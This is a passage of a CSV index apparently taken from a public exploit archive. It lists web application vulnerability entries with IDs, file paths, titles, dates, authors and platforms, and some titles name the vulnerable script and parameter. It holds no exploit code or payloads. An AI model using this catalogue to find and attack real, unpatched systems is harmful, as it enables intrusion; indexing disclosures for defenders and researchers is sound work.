Component WebMaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Inclusion",2007-10-10,Cyber-Crime,php,webapps, -30653,exploits/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - 'setup.php' Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps, -30654,exploits/php/webapps/30654.txt,"ActiveKB NX 2.6 - 'index.php' Cross-Site Scripting",2007-10-11,durito,php,webapps, -30655,exploits/php/webapps/30655.txt,"Joomla! Component Search 1.0.13 - SearchWord Cross-Site Scripting",2007-10-11,MustLive,php,webapps, -30656,exploits/php/webapps/30656.txt,"BoastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,php,webapps, -30657,exploits/php/webapps/30657.txt,"UMI CMS - 'index.php' Cross-Site Scripting",2007-10-11,anonymous,php,webapps, -30658,exploits/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusions",2007-10-11,iNs,php,webapps, -30659,exploits/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps, -30660,exploits/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 Courses - 'detail.php' Multiple SQL Injections",2007-10-11,durito,php,webapps, -30661,exploits/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - 'Report.cgi' Authentication Bypass",2007-10-11,MustLive,cgi,webapps, -30662,exploits/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 - 'Content Management System main.php' SQL Injection",2007-10-11,durito,php,webapps, -30663,exploits/php/webapps/30663.txt,"Linkliste 1.2 - 'index.php' Multiple Remote File Inclusions",2007-10-11,iNs,php,webapps, -30664,exploits/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 - 'Merchant shop.php' SQL Injection",2007-10-11,durito,php,webapps, -30665,exploits/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE / NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass",2014-01-03,"Amplia Security Advisories",hardware,webapps, -30667,exploits/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple Cross-Site Request Forgery Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps, -30668,exploits/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple Cross-Site Scripting Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps, -30669,exploits/windows/webapps/30669.txt,"DirectControlTM 3.1.7.0 - Multiple Vulnerabilities",2014-01-03,"mohamad ch",windows,webapps, -30865,exploits/php/webapps/30865.txt,"DomPHP 0.83 - Local Directory Traversal",2014-01-12,Houssamix,php,webapps, -30795,exploits/cgi/webapps/30795.txt,"GWExtranet - Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps, -30796,exploits/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 - Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps, -31530,exploits/php/webapps/31530.txt,"Joomla! / Mambo Component Download3000 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,php,webapps, -31531,exploits/php/webapps/31531.pl,"Bomba Haber 2.0 - 'haberoku.php' SQL Injection",2008-03-25,cOndemned,php,webapps, -30674,exploits/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script - Cross-Site Scripting",2007-10-15,JosS,java,webapps, -30675,exploits/jsp/webapps/30675.txt,"InnovaPortal - 'tc/contents/home001.jsp?contentid' Cross-Site Scripting",2007-10-15,JosS,jsp,webapps, -30676,exploits/jsp/webapps/30676.txt,"InnovaPortal - 'msg.jsp?msg' Cross-Site Scripting",2007-10-15,JosS,jsp,webapps, -30682,exploits/php/webapps/30682.txt,"SiteBar 3.3.8 - 'translator.php?dir' Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps, -30683,exploits/php/webapps/30683.txt,"SiteBar 3.3.8 - '/translator.php?upd/cmd/Action/edit' Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps, -30684,exploits/php/webapps/30684.txt,"SiteBar 3.3.8 - 'integrator.php?lang' Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps, -30685,exploits/php/webapps/30685.txt,"SiteBar 3.3.8 - 'index.php?target' Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps, -30686,exploits/php/webapps/30686.txt,"SiteBar 3.3.8 - 'command.php?Modify User Action uid' Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps, -30804,exploits/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting",2007-11-24,Crackers_Child,php,webapps, -30689,exploits/php/webapps/30689.php,"Taboada Macronews 1.0 - SQL Injection",2014-01-04,Jefrey,php,webapps, -31027,exploits/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps, -31028,exploits/php/webapps/31028.txt,"Article Dashboard - '/admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,php,webapps, -31029,exploits/php/webapps/31029.pl,"WordPress Plugin Peter's Math Anti-Spam 0.1.6 - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps, -30691,exploits/php/webapps/30691.txt,"Alcatel Lucent Omnivista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps, -30693,exploits/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps, -30694,exploits/php/webapps/30694.txt,"Socketmail 2.2.1 - 'lostpwd.php' Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps, -30695,exploits/php/webapps/30695.txt,"rNote 0.9.7 - 'rnote.php' Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps, -30696,exploits/asp/webapps/30696.txt,"SearchSimon Lite 1.0 - 'Filename.asp' Cross-Site Scripting",2007-10-20,"Aria-Security Team",asp,webapps, -30697,exploits/php/webapps/30697.txt,"ReloadCMS 1.2.5 - 'index.php' Local File Inclusion",2007-10-20,sekuru,php,webapps, -30698,exploits/php/webapps/30698.txt,"Flatnuke3 File Manager Module - Unauthorized Access",2007-10-22,KiNgOfThEwOrLd,php,webapps, -30699,exploits/php/webapps/30699.txt,"Hackish 1.1 - 'Blocco.php' Cross-Site Scripting",2007-10-22,Matrix86,php,webapps, -30700,exploits/php/webapps/30700.txt,"deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection",2007-10-22,"Aria-Security Team",php,webapps, -30701,exploits/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,php,webapps, -30703,exploits/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps, -30704,exploits/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - 'download.jsp?name' Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps, -30705,exploits/jsp/webapps/30705.txt,"Korean GHBoard - 'Component/upload.jsp' Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps, -30706,exploits/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - 'index.asp' SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps, -30707,exploits/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,php,webapps, -30708,exploits/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - 'Page.asp' SQL Injection",2007-10-25,joseph.giron13,asp,webapps, -30712,exploits/php/webapps/30712.txt,"Multi-Forums - 'Directory.php' Multiple SQL Injections",2007-10-25,KiNgOfThEwOrLd,php,webapps, -30715,exploits/php/webapps/30715.txt,"WordPress 2.3 - 'Edit-Post-Rows.php' Cross-Site Scripting",2007-10-29,waraxe,php,webapps, -30716,exploits/php/webapps/30716.txt,"Smart-Shop - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,Doz,php,webapps, -30717,exploits/php/webapps/30717.txt,"Omnistar Live - 'KB.php' Cross-Site Scripting",2007-10-29,Doz,php,webapps, -30718,exploits/php/webapps/30718.txt,"Saxon 5.4 - 'Menu.php' Cross-Site Scripting",2007-10-29,netVigilance,php,webapps, -30719,exploits/php/webapps/30719.txt,"Saxon 5.4 - 'Example.php' SQL Injection",2007-10-29,netVigilance,php,webapps, -30806,exploits/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - 'Directory' Cross-Site Scripting",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps, -30807,exploits/asp/webapps/30807.txt,"GOUAE DWD Realty - 'Password' SQL Injection",2007-11-26,"Aria-Security Team",asp,webapps, -30808,exploits/cgi/webapps/30808.txt,"GWExtranet 3.0 - 'Scp.dll' Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps, -30723,exploits/hardware/webapps/30723.php,"Seagate BlackArmor NAS - Privilege Escalation",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps, -30725,exploits/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps, -30726,exploits/hardware/webapps/30726.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps, -30727,exploits/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps, -30731,exploits/php/webapps/30731.txt,"Synergiser 1.2 - 'index.php' Local File Inclusion",2007-11-01,KiNgOfThEwOrLd,php,webapps, -30732,exploits/php/webapps/30732.txt,"CONTENTCustomizer 3.1 - 'Dialog.php' Information Disclosure",2007-11-01,d3hydr8,php,webapps, -30733,exploits/php/webapps/30733.txt,"phpMyAdmin 2.11.1 - 'Server_Status.php' Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps, -30734,exploits/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - 'admin/index.php' Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps, -30735,exploits/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 - 'index.php' Local File Inclusion",2007-11-03,joseph.giron13,php,webapps, -30737,exploits/php/webapps/30737.txt,"Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion",2007-11-05,"arfis project",php,webapps, -30738,exploits/php/webapps/30738.txt,"E-Vendejo 0.2 - 'Articles.php' SQL Injection",2007-11-05,r00t,php,webapps, -30739,exploits/php/webapps/30739.txt,"JLMForo System - 'Buscado.php' Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps, -30741,exploits/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",2007-11-05,"BorN To K!LL",php,webapps, -30743,exploits/asp/webapps/30743.txt,"i-Gallery 3.4 - 'igallery.asp' Remote Information Disclosure",2007-11-05,hackerbinhphuoc,asp,webapps, -30745,exploits/php/webapps/30745.html,"Weblord.it MS-TopSites - Unauthorized Access / HTML Injection",2007-11-06,0x90,php,webapps, -30746,exploits/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",php,webapps, -30747,exploits/asp/webapps/30747.txt,"Rapid Classified - 'AgencyCatResult.asp' SQL Injection",2007-11-08,The-0utl4w,asp,webapps, -30748,exploits/php/webapps/30748.txt,"XOOPS 2.0.17.1 Mylinks Module - 'Brokenlink.php' SQL Injection",2007-11-09,root@hanicker.it,php,webapps, -30750,exploits/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - 'modules.php' SQL Injection",2007-11-12,0x90,php,webapps, -30751,exploits/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps, -30754,exploits/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - 'PHP_SELF index.php' Cross-Site Scripting",2007-08-27,L4teral,php,webapps, -30757,exploits/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps, -30758,exploits/php/webapps/30758.txt,"X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps, -30759,exploits/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - 'Searchtype' Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps, -30762,exploits/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps, -30764,exploits/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - 'Dialog.php' Unauthorized Access",2007-11-14,d3hydr8,php,webapps, -30770,exploits/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps, -30774,exploits/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps, -30775,exploits/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injections",2007-11-17,"Aria-Security Team",asp,webapps, -30777,exploits/cgi/webapps/30777.txt,"Citrix Netscaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps, -30778,exploits/asp/webapps/30778.txt,"Click&BaneX - 'Details.asp' SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps, -30975,exploits/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps, -30976,exploits/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple SQL Injections",2008-01-03,The:Paradox,php,webapps, -30977,exploits/php/webapps/30977.txt,"WordPress 2.2.3 - '/wp-admin/post.php?popuptitle' Cross-Site Scripting",2008-01-03,3APA3A,php,webapps, -30786,exploits/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,80 -30790,exploits/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 -30811,exploits/php/webapps/30811.txt,"SimpleGallery 0.1.3 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,php,webapps, -30813,exploits/php/webapps/30813.txt,"FMDeluxe 2.1 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,php,webapps, -30815,exploits/php/webapps/30815.txt,"Tilde 4.0 - 'Aarstal' Cross-Site Scripting",2007-11-26,KiNgOfThEwOrLd,php,webapps, -30817,exploits/php/webapps/30817.html,"Liferay Portal 4.3.1 - Forgot-Password Cross-Site Scripting",2007-11-27,"Joshua Morin",php,webapps, -30818,exploits/cgi/webapps/30818.txt,"ht://Dig 3.2 - Htsearch Cross-Site Scripting",2007-11-27,"Michael Skibbe",cgi,webapps, -30820,exploits/php/webapps/30820.txt,"p.mapper 3.2 beta3 - '/incPHP/globals.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps, -30821,exploits/php/webapps/30821.txt,"p.mapper 3.2 beta3 - '/plugins/export/mc_table.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps, -30822,exploits/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal - Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",php,webapps, -30823,exploits/php/webapps/30823.txt,"bcoos 1.0.10 - 'ratephoto.php' SQL Injection",2007-11-28,Lostmon,php,webapps, -30824,exploits/php/webapps/30824.txt,"bcoos 1.0.10 - 'ratelink.php' SQL Injection",2007-11-28,Lostmon,php,webapps, -30826,exploits/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/admin/modules/install_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps, -30827,exploits/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/admin/modules/uninstall_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps, -30828,exploits/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/admin/patch/index.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps, -30829,exploits/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/ossigeno/admin/install_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps, -30830,exploits/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/ossigeno/admin/uninstall_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps, -30831,exploits/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - '/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps, -30836,exploits/php/webapps/30836.txt,"bcoos 1.0.10 - 'ratefile.php' SQL Injection",2007-11-30,Lostmon,php,webapps, -30841,exploits/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - '/pages/default.aspx?template' Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps, -30842,exploits/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple SQL Injections",2007-12-04,"Adrian Pastor",asp,webapps, -30843,exploits/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx?rmore' Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps, -30844,exploits/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 - '/pages/default.aspx?template' Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps, -30845,exploits/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 - 'getpath.aspx' Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps, -30846,exploits/php/webapps/30846.txt,"phpMyChat 0.14.5 - 'chat/deluser.php3?LIMIT' Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps, -30847,exploits/php/webapps/30847.txt,"phpMyChat 0.14.5 - '/chat/users_popupL.php3' Multiple Cross-Site Scripting Vulnerabilities",2007-12-04,beenudel1986,php,webapps, -30848,exploits/php/webapps/30848.txt,"Joomla! Component Content 1.5 RC3 - 'view' SQL Injection",2007-12-05,beenudel1986,php,webapps, -30849,exploits/php/webapps/30849.txt,"Joomla! Component com_search 1.5 RC3 - 'index.php' Multiple SQL Injections",2007-12-05,beenudel1986,php,webapps, -30851,exploits/php/webapps/30851.txt,"VisualShapers EZContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,php,webapps, -30852,exploits/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,php,webapps, -30853,exploits/php/webapps/30853.txt,"OpenNewsletter 2.5 - 'Compose.php' Cross-Site Scripting",2007-12-06,Manu,php,webapps, -30854,exploits/php/webapps/30854.sh,"wwwstats 3.21 - 'Clickstats.php' Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps, -30855,exploits/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injections",2007-12-07,Chrysalid,asp,webapps, -30857,exploits/php/webapps/30857.txt,"webSPELL 4.1.2 - 'usergallery.php?galleryID' Cross-Site Scripting",2007-12-10,Brainhead,php,webapps, -30858,exploits/php/webapps/30858.txt,"webSPELL 4.1.2 - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2007-12-10,Brainhead,php,webapps, -30859,exploits/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps, -30860,exploits/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps, -30861,exploits/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - '/mylinks/ratelink.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps, -30862,exploits/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - '/adresses/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps, -30863,exploits/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 - '/mydownloads/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps, -30864,exploits/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 - '/mysections/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps, -30884,exploits/php/webapps/30884.txt,"XOOPS 2.2.5 - 'register.php' Cross-Site Scripting",2007-11-12,"Omer Singer",php,webapps, -30886,exploits/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module - SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps, -30887,exploits/php/webapps/30887.txt,"phPay 2.2.1 - Windows Installations Local File Inclusion",2007-12-15,"Michael Brooks",php,webapps, -30888,exploits/php/webapps/30888.txt,"phpRPG 0.8 - '/tmp' Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps, -30889,exploits/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps, -30890,exploits/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Inclusions",2007-12-14,RoMaNcYxHaCkEr,php,webapps, -30891,exploits/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps, -30892,exploits/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps, -30893,exploits/php/webapps/30893.txt,"PHP Security Framework - Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps, -30899,exploits/php/webapps/30899.txt,"Mambo 4.6.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",php,webapps, -30909,exploits/php/webapps/30909.html,"Auto Classifieds Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-14,HackXBack,php,webapps,80 -30910,exploits/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,HackXBack,php,webapps,80 -30911,exploits/php/webapps/30911.txt,"PHPJabbers Appointment Scheduler 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,php,webapps,80 -30912,exploits/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,HackXBack,php,webapps,80 -30913,exploits/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,php,webapps,80 -30914,exploits/hardware/webapps/30914.txt,"Conceptronic Wireless Pan & Tilt Network Camera - Cross-Site Request Forgery",2014-01-14,"Felipe Molina",hardware,webapps,80 -30916,exploits/php/webapps/30916.txt,"Burden 1.8 - Authentication Bypass",2014-01-14,"High-Tech Bridge SA",php,webapps,80 -30917,exploits/php/webapps/30917.txt,"Horizon QCMS 4.0 - Multiple Vulnerabilities",2014-01-14,"High-Tech Bridge SA",php,webapps,80 -30918,exploits/php/webapps/30918.txt,"iDevSpot iSupport 1.8 - 'index.php' Local File Inclusion",2007-12-20,JuMp-Er,php,webapps, -30919,exploits/cgi/webapps/30919.txt,"SiteScape Forum - 'dispatch.cgi' Tcl Command Injection",2007-12-20,niekt0,cgi,webapps, -30921,exploits/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection",2007-12-21,root@hanicker.it,php,webapps, -30923,exploits/php/webapps/30923.txt,"MyBlog 1.x - 'Games.php?ID' Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps, -30924,exploits/php/webapps/30924.txt,"Dokeos 1.x - '/forum/viewthread.php?forum' Cross-Site Scripting",2007-12-22,Doz,php,webapps, -30925,exploits/php/webapps/30925.txt,"Dokeos 1.x - '/forum/viewforum.php?forum' Cross-Site Scripting",2007-12-22,Doz,php,webapps, -30926,exploits/php/webapps/30926.txt,"Dokeos 1.x - '/work/work.php?display_upload_form Action origin' Cross-Site Scripting",2007-12-22,Doz,php,webapps, -30927,exploits/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion",2007-12-24,Koller,php,webapps, -30929,exploits/php/webapps/30929.txt,"Logaholic - 'update.php?page' SQL Injection",2007-12-24,malibu.r,php,webapps, -30930,exploits/php/webapps/30930.txt,"Logaholic - 'index.php' SQL Injection",2007-12-24,malibu.r,php,webapps, -30931,exploits/php/webapps/30931.txt,"Logaholic - 'index.php?conf' Cross-Site Scripting",2007-12-24,malibu.r,php,webapps, -30932,exploits/php/webapps/30932.txt,"Logaholic - 'profiles.php?newconfname' Cross-Site Scripting",2007-12-24,malibu.r,php,webapps, -30937,exploits/php/webapps/30937.txt,"Limbo CMS 1.0.4 - 'com_option' Cross-Site Scripting",2007-12-25,"Omer Singer",php,webapps, -30938,exploits/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injections",2007-12-24,bypass,asp,webapps, -30940,exploits/asp/webapps/30940.txt,"IPortalX - '/forum/login_user.asp' Multiple Cross-Site Scripting Vulnerabilities",2007-12-27,Doz,asp,webapps, -30941,exploits/asp/webapps/30941.txt,"IPortalX - 'blogs.asp?Date' Cross-Site Scripting",2007-12-27,Doz,asp,webapps, -30945,exploits/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps, -30946,exploits/php/webapps/30946.txt,"Collabtive 1.1 - 'managetimetracker.php' SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 -30947,exploits/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' SQL Injection",2007-12-28,"Juan Galiana Lara",php,webapps, -30948,exploits/php/webapps/30948.txt,"OpenBiblio 0.x - 'staff_del_confirm.php' Multiple Cross-Site Scripting Vulnerabilities",2007-12-28,"Juan Galiana Lara",php,webapps, -30949,exploits/php/webapps/30949.txt,"OpenBiblio 0.x - 'theme_del_confirm.php?name' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps, -30950,exploits/php/webapps/30950.html,"PHPJabbers Pet Listing Script 1.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,php,webapps,80 -30951,exploits/php/webapps/30951.html,"OpenBiblio 0.x - 'theme_preview.php?themeName' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps, -30952,exploits/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-15,HackXBack,php,webapps,80 -30953,exploits/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,php,webapps,80 -30954,exploits/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,php,webapps,80 -30955,exploits/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,php,webapps,80 -30957,exploits/php/webapps/30957.txt,"PHCDownload 1.1 - 'search.php?string' SQL Injection",2007-12-29,Lostmon,php,webapps, -30958,exploits/php/webapps/30958.txt,"PHCDownload 1.1 - 'search.php?string' Cross-Site Scripting",2007-12-29,Lostmon,php,webapps, -30959,exploits/php/webapps/30959.txt,"Makale Scripti - Cross-Site Scripting",2007-12-29,GeFORC3,php,webapps, -30960,exploits/php/webapps/30960.pl,"CustomCMS 3.1 - 'vars.php' SQL Injection",2007-12-29,Pr0metheuS,php,webapps, -30961,exploits/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 - 'function.php' Remote File Inclusion",2007-12-30,bd0rk,php,webapps, -30962,exploits/php/webapps/30962.txt,"MilliScripts - 'dir.php' Cross-Site Scripting",2007-12-31,"Jose Luis Gangora Fernandez",php,webapps, -30963,exploits/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",asp,webapps, -30964,exploits/php/webapps/30964.txt,"LiveCart 1.0.1 - 'return' Cross-Site Scripting (1)",2007-12-31,Doz,php,webapps, -30965,exploits/php/webapps/30965.txt,"LiveCart 1.0.1 - 'q' Cross-Site Scripting",2007-12-31,Doz,php,webapps, -30966,exploits/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Cross-Site Scripting (2)",2007-12-31,Doz,php,webapps, -30967,exploits/php/webapps/30967.txt,"LiveCart 1.0.1 - 'email' Cross-Site Scripting",2007-12-31,Doz,php,webapps, -30979,exploits/php/webapps/30979.txt,"WordPress 2.2.3 - '/wp-admin/edit.php?backup' Cross-Site Scripting",2008-01-03,3APA3A,php,webapps, -30980,exploits/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps, -30981,exploits/php/webapps/30981.txt,"PRO-Search 0.17 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps, 